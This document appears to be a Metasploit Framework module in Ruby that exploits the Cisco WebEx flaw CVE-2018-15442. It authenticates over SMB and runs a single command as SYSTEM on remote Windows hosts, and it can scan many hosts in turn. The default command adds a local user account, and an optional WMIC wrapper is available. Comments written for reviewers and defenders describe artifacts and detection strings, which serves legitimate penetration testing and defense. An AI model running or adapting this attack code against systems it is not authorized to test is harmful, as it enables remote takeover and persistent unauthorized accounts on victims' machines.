GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/smb/webexec_command.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
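# Auxiliary module that runs one operator-supplied command on a remote Windows
# host through the Cisco WebEx client flaw referenced below as CVE-2018-15442.
#
# Points a reviewer or defender can read directly from this file:
# * The module logs in over SMB (smb_login) before anything else; a failed
#   login aborts the run for that host.
# * The default COMMAND adds a local account named "testuser". That is a
#   persistent change to the host, so a leftover "testuser" account is an
#   artifact worth checking for during incident review.
# * With FORCE_GUI set, the command is wrapped in "WMIC PROCESS CALL Create",
#   a literal that process-creation logging can match on.
# * Mitigation is the vendor fix tracked under the CVE listed in References.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client::WebExec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  # Registers the module metadata and its three options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values declared here via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WebEx Remote Command Execution Utility',
      'Description' => %q{
        This module enables the execution of a single command as System by exploiting a remote
        code execution vulnerability in Cisco's WebEx client software.
      },

      'Author' => [
        'Ron Bowes <[email protected]>',
      ],

      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://webexec.org'],
        ['CVE', '2018-15442']
      ]
    ))

    register_options([
      # NOTE(review): the default command changes target state (adds a local user).
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),
      OptPort.new('RPORT', [true, 'The Target port', 445]),
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),
    ])
  end

  # Main control method: connects, authenticates over SMB, then hands the
  # configured command to the WebExec mixin for a single host.
  #
  # The connection is now released in an +ensure+ clause. Previously
  # +disconnect+ was only reached on the success path, so a failed login or an
  # exception raised while the command was being submitted left the SMB
  # connection open.
  #
  # @param ip [String] address of the host being processed; stored in @ip
  # @return [void]
  def run_host(ip)
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    # Nothing to clean up when the connection was never established.
    return unless connect

    begin
      # Try and authenticate with given credentials
      begin
        smb_login
      rescue Rex::Proto::SMB::Exceptions::Error => e
        print_error("Unable to authenticate with given credentials: #{e}")
        return
      end

      command = datastore['COMMAND']
      # COMMAND is interpolated verbatim between the escaped double quotes, so
      # a value that itself contains double quotes will not survive intact.
      command = "WMIC PROCESS CALL Create \"#{command}\"" if datastore['FORCE_GUI']

      # wexec and execute_single_command come from the WebExec mixin; the
      # meaning of the +true+ argument is defined there, not in this file.
      wexec(true) do |opts|
        execute_single_command(command, opts)
      end

      # Printed whenever wexec returns without raising; the command's own exit
      # status is not inspected here.
      print_good("Command completed!")
    ensure
      disconnect
    end
  end
end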